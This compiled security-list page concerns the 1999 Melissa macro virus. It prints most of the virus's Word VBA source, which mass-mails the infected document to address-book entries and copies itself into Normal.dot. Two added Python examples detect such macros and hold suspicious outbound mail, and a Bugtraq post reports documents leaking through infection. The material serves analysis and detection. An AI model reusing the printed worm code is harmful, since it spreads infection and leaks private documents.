Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
"... by Kwyjibo" Then
If UngaDasOutlook = "Inlook" Then
DasMapName.Logon "profile", "password"
For y = 1 To DasMapName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakOffASlice.Recipients.Add Peep
x++
If x < 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body =
"Here is that document you asked for ... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From". This could,
of course, change in future versions ***

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
"... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo END
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And
(InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for using all my letters.
Game's over. I'm outta here."

End Sub

*** The lines above are some of the most published information about
this virus. Though you can look for the virus with intrusion detection
and other string matching security tools by searching for keywords like
"Kwyjibo", simple modifications of the code could change these. ***
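
The SANS note above makes the point that matching on the "Kwyjibo" string is brittle. The following is an added example, not code from the SANS advisory or from anyone in this thread: a Python scorer that runs over extracted VBA source and weights the behaviours the listing shows (an auto-executing Document_Open, registry writes that lower Word's macro security, Outlook automation against the address book, mailing the active document as an attachment, and rewriting the VBProject of the document or the Normal template). The sample macro text is a constructed, non-working fragment modelled on the listing; the indicator weights and the verdict thresholds are assumptions for illustration.

```python
import re

# (name, pattern, weight).  Weights and thresholds are assumptions chosen for
# this example; tune them against your own document corpus.
INDICATORS = [
    # entry point that fires without a click when the document opens or closes
    ("auto_exec", re.compile(
        r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b", re.I), 1),
    # lowering Word's macro security through the registry, as in the listing
    ("security_tamper", re.compile(r"PrivateProfileString\([^)]*Word\\Security", re.I), 3),
    ("virus_protection_off", re.compile(r"Options\.VirusProtection\s*=", re.I), 3),
    # any registry write via PrivateProfileString (security level, infection marker)
    ("registry_write", re.compile(r"PrivateProfileString\([^)]*\)\s*=", re.I), 2),
    # Outlook automation and address-book harvesting
    ("outlook_automation", re.compile(r'CreateObject\(\s*"Outlook\.Application"\s*\)', re.I), 3),
    ("address_book", re.compile(r"\bAddressLists\b|\bAddressEntries\b", re.I), 2),
    ("mails_itself", re.compile(r"\.Attachments\.Add\b.*\bActiveDocument\.FullName", re.I), 3),
    ("sends_mail", re.compile(r"\.Send\b", re.I), 1),
    # self-replication: rewriting its own or Normal.dot's VBA project
    ("vbproject_access", re.compile(r"\bVBProject\.VBComponents\b", re.I), 3),
    ("code_injection", re.compile(r"\bCodeModule\.(AddFromString|InsertLines)\b", re.I), 3),
    # the published string: cheap to match, and cheap for a variant to drop
    ("kwyjibo_string", re.compile(r"Kwyjibo", re.I), 1),
]


def scan_vba(source: str) -> dict:
    """Map each indicator that fires in `source` to its hit count."""
    return {name: len(pat.findall(source))
            for name, pat, _ in INDICATORS if pat.search(source)}


def score(source: str) -> int:
    """Sum the weights of the indicators present (each counted once)."""
    weights = {name: w for name, _, w in INDICATORS}
    return sum(weights[n] for n in scan_vba(source))


def verdict(source: str) -> str:
    """Thresholds are assumptions: >= 10 malicious, >= 3 suspicious."""
    s = score(source)
    return "malicious" if s >= 10 else "suspicious" if s >= 3 else "clean"


def kwyjibo_only(source: str) -> bool:
    """The string match the SANS note warns is easy to defeat."""
    return "kwyjibo" in source.lower()


# Constructed, deliberately incomplete fragment modelled on the listing.
# It is not runnable VBA and omits the mailing loop and replication body.
MELISSA_LIKE = r"""
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
Options.VirusProtection = (1 - 1)
End If
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
For y = 1 To DasMapiName.AddressLists.Count
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
Next y
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
ADI1.CodeModule.AddFromString ("Private Sub Document_Close()")
'WORD/Melissa written by Kwyjibo
End Sub
"""

# A "variant" with the signature comment and variable names changed.
VARIANT = (MELISSA_LIKE.replace("Kwyjibo", "Bart")
           .replace("UngaDasOutlook", "app").replace("BreakUmOffASlice", "m"))

# A benign auto-open macro that only refreshes fields.
BENIGN = r"""
Private Sub Document_Open()
ActiveDocument.Fields.Update
End Sub
"""

if __name__ == "__main__":
    for label, src in (("listing", MELISSA_LIKE), ("renamed variant", VARIANT), ("benign", BENIGN)):
        print(f"{label:16} score={score(src):2} verdict={verdict(src):10} "
              f"string-match={kwyjibo_only(src)} hits={sorted(scan_vba(src))}")
```

Run stand-alone it scores the constructed listing, the renamed copy, and the benign macro. The renamed copy no longer matches the string check but still scores as malicious on behaviour, which is the point of the SANS remark. In practice the VBA text is first pulled out of the .doc container (oletools' olevba does this) and the scorer runs on that output.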

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 21:40:59 -0600
From: Simple Nomad <thegnome@NMRC.ORG>
To: BUGTRAQ@netspace.org
Subject: "Leaking" of docs via Melissa

An interesting thing -- as users are infected with Melissa some of the new
documents they create after infection become the carrier and are mailed
out. If you scan for inbound messages, it would be advised to scan for
outbound messages as well. I received a copy of an employee evaluation
from an old client, and considering the poor rating of this guy I'd say
there's a lawsuit in the making as it apparently went not only to me but
to an internal email bulletin board.

Simple Nomad //
thegnome@nmrc.org // ....no rest for the Wicca'd....
www.nmrc.org //
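
Simple Nomad's observation above is that an infected user mails out whatever documents they create afterwards, so the outbound side needs the same check as inbound. The following is an added example, not code from this thread: a Python check over an outbound RFC 822 message that holds it when a Word attachment travels with the published subject or body text, and also when a single Word attachment goes to an unusually wide recipient list, since a variant can change the strings but still mails the first 50 entries of the address book. The messages are constructed samples; the WIDE_SEND threshold and the file-extension list are assumptions.

```python
import re
from email import message_from_string
from email.message import Message
from email.utils import getaddresses

# Traits published for Melissa: subject "Important Message From <user>" and
# one fixed body sentence.  Both are matched case-insensitively.
SUBJECT_RE = re.compile(r"^\s*Important Message From\b", re.I)
BODY_RE = re.compile(r"here is that document you asked for.*don't show anyone else", re.I | re.S)
WORD_EXTS = (".doc", ".dot")
# Melissa mails the first 50 address-book entries in one message.  Any single
# outbound message carrying a Word file to this many recipients is held for
# review even if the strings have changed.  The threshold is an assumption.
WIDE_SEND = 25


def word_attachments(msg: Message) -> list:
    """File names of every .doc/.dot part in the message."""
    return [p.get_filename() for p in msg.walk()
            if p.get_filename() and p.get_filename().lower().endswith(WORD_EXTS)]


def recipients(msg: Message) -> list:
    """All recipient addresses named in To/Cc/Bcc."""
    addrs = []
    for hdr in ("To", "Cc", "Bcc"):
        addrs += [a for _, a in getaddresses(msg.get_all(hdr, []))]
    return addrs


def body_text(msg: Message) -> str:
    """First text/plain body part, decoded."""
    for p in msg.walk():
        if p.get_content_type() == "text/plain" and not p.get_filename():
            raw = p.get_payload(decode=True) or b""
            return raw.decode(p.get_content_charset() or "us-ascii", "replace")
    return ""


def check_outbound(raw_message: str) -> dict:
    """Decide whether an outbound message should be held, and why."""
    msg = message_from_string(raw_message)
    docs = word_attachments(msg)
    rcpts = recipients(msg)
    reasons = []
    if docs and SUBJECT_RE.search(msg.get("Subject", "")):
        reasons.append("melissa_subject")
    if docs and BODY_RE.search(body_text(msg)):
        reasons.append("melissa_body")
    if docs and len(rcpts) >= WIDE_SEND:
        reasons.append("word_attachment_wide_send")
    return {"hold": bool(reasons), "reasons": reasons,
            "attachments": docs, "recipients": len(rcpts)}


def make_message(subject: str, body: str, to: list, filename: str = "report.doc") -> str:
    """Constructed test message (not real mail): one text part plus one .doc part."""
    return (
        "From: alice@example.org\n"
        f"To: {', '.join(to)}\n"
        f"Subject: {subject}\n"
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="XX"\n'
        "\n--XX\n"
        'Content-Type: text/plain; charset="us-ascii"\n\n'
        f"{body}\n"
        "--XX\n"
        f'Content-Type: application/msword; name="{filename}"\n'
        f'Content-Disposition: attachment; filename="{filename}"\n'
        "Content-Transfer-Encoding: base64\n\n"
        "0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA\n"  # OLE2 magic plus padding, not a real document
        "--XX--\n"
    )


# Constructed samples.
MELISSA_MSG = make_message(
    "Important Message From Alice",
    "Here is that document you asked for ... don't show anyone else ;-)",
    ["bob@example.org", "carol@example.org"], "evaluation.doc")
BENIGN_MSG = make_message(
    "Q3 evaluation draft", "Attached as discussed.",
    ["bob@example.org", "carol@example.org"], "evaluation.doc")
WIDE_MSG = make_message(
    "Budget figures", "See attached.",
    [f"user{i}@example.org" for i in range(50)])

if __name__ == "__main__":
    for label, m in (("melissa", MELISSA_MSG), ("benign", BENIGN_MSG), ("wide", WIDE_MSG)):
        print(label, check_outbound(m))
```

The wide-send rule is the one that survives a string change: the subject and body checks catch the published variant, while a Word file addressed to dozens of recipients from one user is held regardless of what the message says, and a human decides whether it was a real mass mailing.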

